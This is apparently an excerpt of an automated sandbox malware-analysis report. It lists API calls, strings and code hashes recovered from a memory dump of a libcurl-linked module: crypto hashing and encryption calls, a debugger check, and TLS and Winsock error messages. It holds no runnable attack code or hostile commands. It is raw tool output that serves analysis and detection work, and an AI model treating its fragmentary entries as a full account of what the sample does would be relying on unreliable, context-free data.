                                                                                                                                  • CryptCreateHash.ADVAPI32(00000000,00008002,00000000,00000000,00000000), ref: 6B8F20DD
                                                                                                                                  • CryptHashData.ADVAPI32(00000000,00000000,00000000,00000000), ref: 6B8F20F7
                                                                                                                                  • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,00000000,00000000), ref: 6B8F2111
                                                                                                                                  • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,00000010,00000000), ref: 6B8F212B
                                                                                                                                  • CryptDestroyHash.ADVAPI32(00000000), ref: 6B8F2139
                                                                                                                                  • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 6B8F2149
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2996515029.000000006B8D1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B8D0000, based on PE: true
                                                                                                                                   • Associated: 0000000A.00000002.2996472368.000000006B8D0000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                   • Associated: 0000000A.00000002.2997000852.000000006B93B000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                   • Associated: 0000000A.00000002.2997178701.000000006B951000.00000004.00000001.01000000.00000017.sdmp
                                                                                                                                   • Associated: 0000000A.00000002.2997269858.000000006B954000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_6b8d0000_ast.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Crypt$Hash$ContextParam$AcquireCreateDataDestroyRelease
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3606780921-0
                                                                                                                                  • Opcode ID: 758966a6a404c74c0002fc1f0b54143afe1e2fb0f373f7e78a4190db69819f61
                                                                                                                                  • Instruction ID: 60010c4a5f631ecb5afbec8ed54000b410a150c3a27dc24a0adc3e15bb865c1a
                                                                                                                                  • Opcode Fuzzy Hash: 758966a6a404c74c0002fc1f0b54143afe1e2fb0f373f7e78a4190db69819f61
                                                                                                                                  • Instruction Fuzzy Hash: 7D113A74A44208BBEF20AF90CC4AF9DBB7CEB06700F1040A0FA14B61D4D7B9EA54DB24
                                                                                                                                  APIs
                                                                                                                                  • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000040,?), ref: 6B8D803A
                                                                                                                                  • CryptImportKey.ADVAPI32(?,00000208,00000014,00000000,00000000,?,?,?), ref: 6B8D80E9
                                                                                                                                  • CryptReleaseContext.ADVAPI32(?,00000000,?), ref: 6B8D80F8
                                                                                                                                  • CryptEncrypt.ADVAPI32(?,00000000,00000000,00000000,?,00000008,00000008,?), ref: 6B8D812D
                                                                                                                                  • CryptDestroyKey.ADVAPI32(?), ref: 6B8D8136
                                                                                                                                  • CryptReleaseContext.ADVAPI32(?,00000000), ref: 6B8D8141
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2996515029.000000006B8D1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B8D0000, based on PE: true
                                                                                                                                   • Associated: 0000000A.00000002.2996472368.000000006B8D0000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                   • Associated: 0000000A.00000002.2997000852.000000006B93B000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                   • Associated: 0000000A.00000002.2997178701.000000006B951000.00000004.00000001.01000000.00000017.sdmp
                                                                                                                                   • Associated: 0000000A.00000002.2997269858.000000006B954000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_6b8d0000_ast.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Crypt$Context$Release$AcquireDestroyEncryptImport
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3016261861-0
                                                                                                                                  • Opcode ID: a022eb0b8a6218708b13c42a92fdbcf5464a89ad9fe57b100844eeb5bda984dc
                                                                                                                                  • Instruction ID: 429d42d2a752aa4adf6526942cd42d154899d5609ea117bfcaba72bc767e560c
                                                                                                                                  • Opcode Fuzzy Hash: a022eb0b8a6218708b13c42a92fdbcf5464a89ad9fe57b100844eeb5bda984dc
                                                                                                                                  • Instruction Fuzzy Hash: 9D41B435904249AFEF11DFA8C846BEEBFB5EF1B300F105095E564A7381C736A50ADB60
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2996515029.000000006B8D1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B8D0000, based on PE: true
                                                                                                                                   • Associated: 0000000A.00000002.2996472368.000000006B8D0000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                   • Associated: 0000000A.00000002.2997000852.000000006B93B000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                   • Associated: 0000000A.00000002.2997178701.000000006B951000.00000004.00000001.01000000.00000017.sdmp
                                                                                                                                   • Associated: 0000000A.00000002.2997269858.000000006B954000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_6b8d0000_ast.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: %02d:%02d%n$%02d:%02d:%02d%n$%31[ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz]$+$<$GMT
                                                                                                                                  • API String ID: 0-3646017816
                                                                                                                                  • Opcode ID: a85ed697f5c3e7b9a0b639c96d6739b42c53ea316cbc8bebae64c41073a5b5e6
                                                                                                                                  • Instruction ID: 9f6d12aba28e34f0b617bb323aa74d79b393fc7c5470f665f95d250f17f3bf28
                                                                                                                                  • Opcode Fuzzy Hash: a85ed697f5c3e7b9a0b639c96d6739b42c53ea316cbc8bebae64c41073a5b5e6
                                                                                                                                  • Instruction Fuzzy Hash: 3802D371E042188FCF04CEBCD8516DDB7F9EF893A4F15866AE825EB380D73998468B50
                                                                                                                                  APIs
                                                                                                                                  • CryptGetHashParam.ADVAPI32(?,00000002,00000000,?,00000000), ref: 6B8F21DC
                                                                                                                                  • CryptGetHashParam.ADVAPI32(00000010,00000002,?,00000010,00000000), ref: 6B8F21F6
                                                                                                                                  • CryptDestroyHash.ADVAPI32(00000010), ref: 6B8F2204
                                                                                                                                  • CryptReleaseContext.ADVAPI32(00000010,00000000), ref: 6B8F2214
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2996515029.000000006B8D1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B8D0000, based on PE: true
                                                                                                                                   • Associated: 0000000A.00000002.2996472368.000000006B8D0000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                   • Associated: 0000000A.00000002.2997000852.000000006B93B000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                   • Associated: 0000000A.00000002.2997178701.000000006B951000.00000004.00000001.01000000.00000017.sdmp
                                                                                                                                   • Associated: 0000000A.00000002.2997269858.000000006B954000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_6b8d0000_ast.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Crypt$Hash$Param$ContextDestroyRelease
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2110207923-0
                                                                                                                                  • Opcode ID: 39b6a85f0724f676bf80479b919f4b5a232bd7f00dd398f22fbac918943bfeb0
                                                                                                                                  • Instruction ID: 801e817f15d1454c6abe50467d4199bbb08c7d23a95d939d9d94fd7101302371
                                                                                                                                  • Opcode Fuzzy Hash: 39b6a85f0724f676bf80479b919f4b5a232bd7f00dd398f22fbac918943bfeb0
                                                                                                                                  • Instruction Fuzzy Hash: 70F04974644209FBEF20DF90CD4AF9ABBBCEB06B41F104854FA65A7180D774EA00AB60
                                                                                                                                  APIs
                                                                                                                                  • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 6B92F0D9
                                                                                                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 6B92F0E3
                                                                                                                                  • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 6B92F0F0
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2996515029.000000006B8D1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B8D0000, based on PE: true
                                                                                                                                   • Associated: 0000000A.00000002.2996472368.000000006B8D0000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                   • Associated: 0000000A.00000002.2997000852.000000006B93B000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                   • Associated: 0000000A.00000002.2997178701.000000006B951000.00000004.00000001.01000000.00000017.sdmp
                                                                                                                                   • Associated: 0000000A.00000002.2997269858.000000006B954000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_6b8d0000_ast.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3906539128-0
                                                                                                                                  • Opcode ID: effda95143ecc0effc7d5e167d383ebd54f496cb73127df1a5b7e7509d57a19f
                                                                                                                                  • Instruction ID: e68af20aeccea9964a0a22dd249479312d8a09c90d2f30da64dfb1b41197b4fa
                                                                                                                                  • Opcode Fuzzy Hash: effda95143ecc0effc7d5e167d383ebd54f496cb73127df1a5b7e7509d57a19f
                                                                                                                                  • Instruction Fuzzy Hash: 9831E375D1522CABCB21DF64DC8979CBBB8BF08314F5081EAE81DA7250EB349B818F44
                                                                                                                                  APIs
                                                                                                                                  • GetCurrentProcess.KERNEL32(?,?,6B92C43D,?,00000000,?,?,?,6B9284AA), ref: 6B92C460
                                                                                                                                  • TerminateProcess.KERNEL32(00000000,?,6B92C43D,?,00000000,?,?,?,6B9284AA), ref: 6B92C467
                                                                                                                                  • ExitProcess.KERNEL32 ref: 6B92C479
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2996515029.000000006B8D1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B8D0000, based on PE: true
                                                                                                                                   • Associated: 0000000A.00000002.2996472368.000000006B8D0000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                   • Associated: 0000000A.00000002.2997000852.000000006B93B000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                   • Associated: 0000000A.00000002.2997178701.000000006B951000.00000004.00000001.01000000.00000017.sdmp
                                                                                                                                   • Associated: 0000000A.00000002.2997269858.000000006B954000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_6b8d0000_ast.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Process$CurrentExitTerminate
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1703294689-0
                                                                                                                                  • Opcode ID: bb80fe08e93f756d3163ec92896e77cff555a76d19e87281f72938865cce2148
                                                                                                                                  • Instruction ID: 32005557354aa54205d7f7cc964698dfa56c8e33c62b4c5dfede2b3743b4829b
                                                                                                                                  • Opcode Fuzzy Hash: bb80fe08e93f756d3163ec92896e77cff555a76d19e87281f72938865cce2148
                                                                                                                                  • Instruction Fuzzy Hash: 96E0EC31414518BFCF116F65C959F593B79EB46B46F108424F81986135CB39D981DB80
                                                                                                                                  APIs
                                                                                                                                  • curl_msnprintf.LIBCURL(?,00000005,%lx,00000000,?,?), ref: 6B8F12F9
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2996515029.000000006B8D1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B8D0000, based on PE: true
                                                                                                                                   • Associated: 0000000A.00000002.2996472368.000000006B8D0000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                   • Associated: 0000000A.00000002.2997000852.000000006B93B000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                   • Associated: 0000000A.00000002.2997178701.000000006B951000.00000004.00000001.01000000.00000017.sdmp
                                                                                                                                   • Associated: 0000000A.00000002.2997269858.000000006B954000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_6b8d0000_ast.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: curl_msnprintf
                                                                                                                                  • String ID: %lx
                                                                                                                                  • API String ID: 1809024409-1448181948
                                                                                                                                  • Opcode ID: 0faff4a5a5893fe5ec3896254927b7c48ce81e0ddf68de8122eab59951e43d8b
                                                                                                                                  • Instruction ID: 7efd1477baff933f1a476871c6971e6d6c4967117ca1efa472ce7e131d8f4c03
                                                                                                                                  • Opcode Fuzzy Hash: 0faff4a5a5893fe5ec3896254927b7c48ce81e0ddf68de8122eab59951e43d8b
                                                                                                                                  • Instruction Fuzzy Hash: B5712A71E0416A8BCB10DEBCC4803ADB7A6EF863A4F144769D469DB6C4E739994BC780
                                                                                                                                  APIs
                                                                                                                                  • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000040), ref: 6B8F2173
                                                                                                                                  • CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000,?), ref: 6B8F218C
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2996515029.000000006B8D1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B8D0000, based on PE: true
                                                                                                                                   • Associated: 0000000A.00000002.2996472368.000000006B8D0000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                   • Associated: 0000000A.00000002.2997000852.000000006B93B000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                   • Associated: 0000000A.00000002.2997178701.000000006B951000.00000004.00000001.01000000.00000017.sdmp
                                                                                                                                   • Associated: 0000000A.00000002.2997269858.000000006B954000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_6b8d0000_ast.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Crypt$AcquireContextCreateHash
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1914063823-0
                                                                                                                                  APIs
                                                                                                                                  • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?), ref: 6B92BF1D
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ExceptionRaise
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3997070919-0
                                                                                                                                  APIs
                                                                                                                                  • CryptHashData.ADVAPI32(?,?,?,00000000), ref: 6B8F21B1
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CryptDataHash
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 4245837645-0
                                                                                                                                  Strings
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: GetSystemTimePreciseAsFileTime
                                                                                                                                  • API String ID: 0-595813830
                                                                                                                                  APIs
                                                                                                                                  • GetLastError.KERNEL32(6B908609,00000000,6B907A04), ref: 6B909A9F
                                                                                                                                  Strings
                                                                                                                                  • SEC_E_ILLEGAL_MESSAGE (0x%08X) - This error usually occurs when a fatal SSL/TLS alert is received (e.g. handshake failed). More detail may be available in the Windows System event log., xrefs: 6B909E88
                                                                                                                                  • SEC_E_MAX_REFERRALS_EXCEEDED, xrefs: 6B909C44
                                                                                                                                  • SEC_E_INCOMPLETE_CREDENTIALS, xrefs: 6B909BAE
                                                                                                                                  • SEC_I_COMPLETE_AND_CONTINUE, xrefs: 6B909E3E
                                                                                                                                  • SEC_E_LOGON_DENIED, xrefs: 6B909C3A
                                                                                                                                  • CRYPT_E_REVOKED, xrefs: 6B909DB6
                                                                                                                                  • SEC_E_UNKNOWN_CREDENTIALS, xrefs: 6B909D7A
                                                                                                                                  • Unknown error, xrefs: 6B909E76
                                                                                                                                  • SEC_E_INVALID_PARAMETER, xrefs: 6B909BE0
                                                                                                                                  • SEC_E_PKINIT_CLIENT_FAILURE, xrefs: 6B909CD0
                                                                                                                                  • SEC_I_LOCAL_LOGON, xrefs: 6B909E5A
                                                                                                                                  • SEC_E_NO_CREDENTIALS, xrefs: 6B909C80
                                                                                                                                  • SEC_E_CONTEXT_EXPIRED, xrefs: 6B909B54
                                                                                                                                  • SEC_E_NO_IMPERSONATION, xrefs: 6B909C8A
                                                                                                                                  • SEC_E_BAD_PKGID, xrefs: 6B909B0E
                                                                                                                                  • SEC_E_PKINIT_NAME_MISMATCH, xrefs: 6B909CDA
                                                                                                                                  • SEC_I_NO_LSA_CONTEXT, xrefs: 6B909E61
                                                                                                                                  • SEC_E_UNSUPPORTED_PREAUTH, xrefs: 6B909D8E
                                                                                                                                  • SEC_E_KDC_INVALID_REQUEST, xrefs: 6B909C1C
                                                                                                                                  • SEC_E_CRYPTO_SYSTEM_INVALID, xrefs: 6B909B68
                                                                                                                                  • SEC_E_TIME_SKEW, xrefs: 6B909D5C
                                                                                                                                  • SEC_E_ILLEGAL_MESSAGE, xrefs: 6B909BA4
                                                                                                                                  • SEC_E_DELEGATION_REQUIRED, xrefs: 6B909B86
                                                                                                                                  • SEC_E_MUST_BE_KDC, xrefs: 6B909C62
                                                                                                                                  • SEC_E_UNSUPPORTED_FUNCTION, xrefs: 6B909D84
                                                                                                                                  • %s (0x%08X), xrefs: 6B909DBD
                                                                                                                                  • SEC_I_CONTINUE_NEEDED, xrefs: 6B909DBC, 6B909E1E
                                                                                                                                  • SEC_E_INTERNAL_ERROR, xrefs: 6B909BCC
                                                                                                                                  • SEC_E_NO_IP_ADDRESSES, xrefs: 6B909C94
                                                                                                                                  • SEC_E_CERT_EXPIRED, xrefs: 6B909B36
                                                                                                                                  • SEC_I_RENEGOTIATE, xrefs: 6B909E68
                                                                                                                                  • SEC_E_SECPKG_NOT_FOUND, xrefs: 6B909D0C
                                                                                                                                  • SEC_E_POLICY_NLTM_ONLY, xrefs: 6B909CE4
                                                                                                                                  • SEC_E_CANNOT_INSTALL, xrefs: 6B909B22
                                                                                                                                  • SEC_E_CANNOT_PACK, xrefs: 6B909B2C
                                                                                                                                  • SEC_E_NO_PA_DATA, xrefs: 6B909CA8
                                                                                                                                  • SEC_I_SIGNATURE_NEEDED, xrefs: 6B909E6F
                                                                                                                                  • SEC_E_ENCRYPT_FAILURE, xrefs: 6B909B9A
                                                                                                                                  • SEC_E_INCOMPLETE_MESSAGE, xrefs: 6B909BB8
                                                                                                                                  • SEC_E_REVOCATION_OFFLINE_KDC, xrefs: 6B909D02
                                                                                                                                  • SEC_E_NO_AUTHENTICATING_AUTHORITY, xrefs: 6B909C76
                                                                                                                                  • SEC_E_KDC_CERT_REVOKED, xrefs: 6B909C12
                                                                                                                                  • SEC_E_SHUTDOWN_IN_PROGRESS, xrefs: 6B909D20
                                                                                                                                  • SEC_E_QOP_NOT_SUPPORTED, xrefs: 6B909CEE
                                                                                                                                  • SEC_E_NO_TGT_REPLY, xrefs: 6B909CBC
                                                                                                                                  • SEC_E_INVALID_TOKEN, xrefs: 6B909BEA
                                                                                                                                  • SEC_E_NO_S4U_PROT_SUPPORT, xrefs: 6B909CB2
                                                                                                                                  • SEC_E_DELEGATION_POLICY, xrefs: 6B909B7C
                                                                                                                                  • SEC_E_ISSUING_CA_UNTRUSTED, xrefs: 6B909BF4
                                                                                                                                  • SEC_E_DOWNGRADE_DETECTED, xrefs: 6B909B90
                                                                                                                                  • SEC_E_BUFFER_TOO_SMALL, xrefs: 6B909B18
                                                                                                                                  • SEC_E_SMARTCARD_LOGON_REQUIRED, xrefs: 6B909D3E
                                                                                                                                  • SEC_E_UNTRUSTED_ROOT, xrefs: 6B909D98
                                                                                                                                  • SEC_E_MESSAGE_ALTERED, xrefs: 6B909C4E
                                                                                                                                  • SEC_E_DECRYPT_FAILURE, xrefs: 6B909B72
                                                                                                                                  • SEC_E_CROSSREALM_DELEGATION_FAILURE, xrefs: 6B909B5E
                                                                                                                                  • SEC_E_WRONG_PRINCIPAL, xrefs: 6B909DAC
                                                                                                                                  • SEC_E_STRONG_CRYPTO_NOT_SUPPORTED, xrefs: 6B909D48
                                                                                                                                  • SEC_E_SMARTCARD_CERT_REVOKED, xrefs: 6B909D34
                                                                                                                                  • SEC_E_OUT_OF_SEQUENCE, xrefs: 6B909CC6
                                                                                                                                  • SEC_E_REVOCATION_OFFLINE_C, xrefs: 6B909CF8
                                                                                                                                  • SEC_E_KDC_CERT_EXPIRED, xrefs: 6B909C08
                                                                                                                                  • SEC_E_UNFINISHED_CONTEXT_DELETED, xrefs: 6B909D70
                                                                                                                                  • SEC_E_BAD_BINDINGS, xrefs: 6B909B04
                                                                                                                                  • SEC_E_KDC_UNKNOWN_ETYPE, xrefs: 6B909C30
                                                                                                                                  • SEC_I_INCOMPLETE_CREDENTIALS, xrefs: 6B909E53
                                                                                                                                  • SEC_E_TOO_MANY_PRINCIPALS, xrefs: 6B909D66
                                                                                                                                  • SEC_E_ALGORITHM_MISMATCH, xrefs: 6B909AFA
                                                                                                                                  • SEC_E_SECURITY_QOS_FAILED, xrefs: 6B909D16
                                                                                                                                  • SEC_E_INSUFFICIENT_MEMORY, xrefs: 6B909BC2
                                                                                                                                  • No error, xrefs: 6B909E17
                                                                                                                                  • SEC_E_CERT_WRONG_USAGE, xrefs: 6B909B4A
                                                                                                                                  • SEC_E_ISSUING_CA_UNTRUSTED_KDC, xrefs: 6B909BFE
                                                                                                                                  • SEC_E_SMARTCARD_CERT_EXPIRED, xrefs: 6B909D2A
                                                                                                                                  • SEC_E_NOT_OWNER, xrefs: 6B909C6C
                                                                                                                                  • SEC_E_INVALID_HANDLE, xrefs: 6B909BD6
                                                                                                                                  • SEC_E_CERT_UNKNOWN, xrefs: 6B909B40
                                                                                                                                  • %s - %s, xrefs: 6B909DF5
                                                                                                                                  • SEC_E_NO_KERB_KEY, xrefs: 6B909C9E
                                                                                                                                  • SEC_E_MULTIPLE_ACCOUNTS, xrefs: 6B909C58
                                                                                                                                  • SEC_I_CONTEXT_EXPIRED, xrefs: 6B909E4C
                                                                                                                                  • SEC_I_COMPLETE_NEEDED, xrefs: 6B909E45
                                                                                                                                  • SEC_E_TARGET_UNKNOWN, xrefs: 6B909D52
                                                                                                                                  • SEC_E_WRONG_CREDENTIAL_HANDLE, xrefs: 6B909DA2
                                                                                                                                  • SEC_E_KDC_UNABLE_TO_REFER, xrefs: 6B909C26
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2996515029.000000006B8D1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B8D0000, based on PE: true
                                                                                                                                   • Associated: 0000000A.00000002.2996472368.000000006B8D0000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                   • Associated: 0000000A.00000002.2997000852.000000006B93B000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                   • Associated: 0000000A.00000002.2997178701.000000006B951000.00000004.00000001.01000000.00000017.sdmp
                                                                                                                                   • Associated: 0000000A.00000002.2997269858.000000006B954000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_6b8d0000_ast.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLast
                                                                                                                                   • String ID: %s (0x%08X)$%s - %s$CRYPT_E_REVOKED$No error$SEC_E_ALGORITHM_MISMATCH$SEC_E_BAD_BINDINGS$SEC_E_BAD_PKGID$SEC_E_BUFFER_TOO_SMALL$SEC_E_CANNOT_INSTALL$SEC_E_CANNOT_PACK$SEC_E_CERT_EXPIRED$SEC_E_CERT_UNKNOWN$SEC_E_CERT_WRONG_USAGE$SEC_E_CONTEXT_EXPIRED$SEC_E_CROSSREALM_DELEGATION_FAILURE$SEC_E_CRYPTO_SYSTEM_INVALID$SEC_E_DECRYPT_FAILURE$SEC_E_DELEGATION_POLICY$SEC_E_DELEGATION_REQUIRED$SEC_E_DOWNGRADE_DETECTED$SEC_E_ENCRYPT_FAILURE$SEC_E_ILLEGAL_MESSAGE$SEC_E_ILLEGAL_MESSAGE (0x%08X) - This error usually occurs when a fatal SSL/TLS alert is received (e.g. handshake failed). More detail may be available in the Windows System event log.$SEC_E_INCOMPLETE_CREDENTIALS$SEC_E_INCOMPLETE_MESSAGE$SEC_E_INSUFFICIENT_MEMORY$SEC_E_INTERNAL_ERROR$SEC_E_INVALID_HANDLE$SEC_E_INVALID_PARAMETER$SEC_E_INVALID_TOKEN$SEC_E_ISSUING_CA_UNTRUSTED$SEC_E_ISSUING_CA_UNTRUSTED_KDC$SEC_E_KDC_CERT_EXPIRED$SEC_E_KDC_CERT_REVOKED$SEC_E_KDC_INVALID_REQUEST$SEC_E_KDC_UNABLE_TO_REFER$SEC_E_KDC_UNKNOWN_ETYPE$SEC_E_LOGON_DENIED$SEC_E_MAX_REFERRALS_EXCEEDED$SEC_E_MESSAGE_ALTERED$SEC_E_MULTIPLE_ACCOUNTS$SEC_E_MUST_BE_KDC$SEC_E_NOT_OWNER$SEC_E_NO_AUTHENTICATING_AUTHORITY$SEC_E_NO_CREDENTIALS$SEC_E_NO_IMPERSONATION$SEC_E_NO_IP_ADDRESSES$SEC_E_NO_KERB_KEY$SEC_E_NO_PA_DATA$SEC_E_NO_S4U_PROT_SUPPORT$SEC_E_NO_TGT_REPLY$SEC_E_OUT_OF_SEQUENCE$SEC_E_PKINIT_CLIENT_FAILURE$SEC_E_PKINIT_NAME_MISMATCH$SEC_E_POLICY_NLTM_ONLY$SEC_E_QOP_NOT_SUPPORTED$SEC_E_REVOCATION_OFFLINE_C$SEC_E_REVOCATION_OFFLINE_KDC$SEC_E_SECPKG_NOT_FOUND$SEC_E_SECURITY_QOS_FAILED$SEC_E_SHUTDOWN_IN_PROGRESS$SEC_E_SMARTCARD_CERT_EXPIRED$SEC_E_SMARTCARD_CERT_REVOKED$SEC_E_SMARTCARD_LOGON_REQUIRED$SEC_E_STRONG_CRYPTO_NOT_SUPPORTED$SEC_E_TARGET_UNKNOWN$SEC_E_TIME_SKEW$SEC_E_TOO_MANY_PRINCIPALS$SEC_E_UNFINISHED_CONTEXT_DELETED$SEC_E_UNKNOWN_CREDENTIALS$SEC_E_UNSUPPORTED_FUNCTION$SEC_E_UNSUPPORTED_PREAUTH$SEC_E_UNTRUSTED_ROOT$SEC_E_WRONG_CREDENTIAL_HANDLE$SEC_E_WRONG_PRINCIPAL$SEC_I_COMPLETE_AND_CONTINUE$SEC_I_COMPLETE_NEEDED$SEC_I_CONTEXT_EXPIRED$SEC_I_CONTINUE_NEEDED$SEC_I_INCOMPLETE_CREDENTIALS$SEC_I_LOCAL_LOGON$SEC_I_NO_LSA_CONTEXT$SEC_I_RENEGOTIATE$SEC_I_SIGNATURE_NEEDED$Unknown error
                                                                                                                                  • API String ID: 1452528299-1081713384
                                                                                                                                  • Opcode ID: 772960577e68770a60bca4e3e0d4e7740d36e80d2a2d9fc132b6bff11e158855
                                                                                                                                  • Instruction ID: 308f1b973f3bf22c0edf77f07b8ad0e96bb7aab4fec0aab8ec552aeb233dd328
                                                                                                                                  • Opcode Fuzzy Hash: 772960577e68770a60bca4e3e0d4e7740d36e80d2a2d9fc132b6bff11e158855
                                                                                                                                  • Instruction Fuzzy Hash: 5791122069CB04D7C634857C85C8595FA6A6B27BC4B58C27EF903CF22ADE2DCD864763
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2996515029.000000006B8D1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B8D0000, based on PE: true
                                                                                                                                   • Associated: 0000000A.00000002.2996472368.000000006B8D0000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                   • Associated: 0000000A.00000002.2997000852.000000006B93B000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                   • Associated: 0000000A.00000002.2997178701.000000006B951000.00000004.00000001.01000000.00000017.sdmp
                                                                                                                                   • Associated: 0000000A.00000002.2997269858.000000006B954000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_6b8d0000_ast.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _strncpy
                                                                                                                                  • String ID: Address already in use$Address family not supported$Address not available$Bad access$Bad argument$Bad file$Bad message size$Bad protocol$Bad quota$Blocking call in progress$Call interrupted$Call would block$Connection refused$Connection was aborted$Connection was reset$Descriptor is not a socket$Disconnected$Host down$Host not found$Host not found, try again$Host unreachable$Invalid arguments$Loop??$Name too long$Need destination address$Network down$Network has been reset$Network unreachable$No buffer space$No data record of requested type$Not empty$Operation not supported$Out of file descriptors$Process limit reached$Protocol family not supported$Protocol is unsupported$Protocol option is unsupported$Remote error$Socket has been shut down$Socket is already connected$Socket is not connected$Socket is unsupported$Something is stale$Timed out$Too many references$Too many users$Unrecoverable error in call to nameserver$Winsock library is not ready$Winsock library not initialised$Winsock version not supported
                                                                                                                                  • API String ID: 2961919466-3442644082
                                                                                                                                  • Opcode ID: 4eb470a7f1c6b614eac145c0da6536eab89a7528e2a97f0fd43bf8e0cfa3303e
                                                                                                                                  • Instruction ID: b2fb743b82b983767d7545fde1e4a2e3f0af2df4c5d5fb7383cf1eff8049fba6
                                                                                                                                  • Opcode Fuzzy Hash: 4eb470a7f1c6b614eac145c0da6536eab89a7528e2a97f0fd43bf8e0cfa3303e
                                                                                                                                  • Instruction Fuzzy Hash: A44150222A8309AB8134096D5B106573647BB53B90B83C6BEB804CE3D2E87EC84773D7
                                                                                                                                  APIs
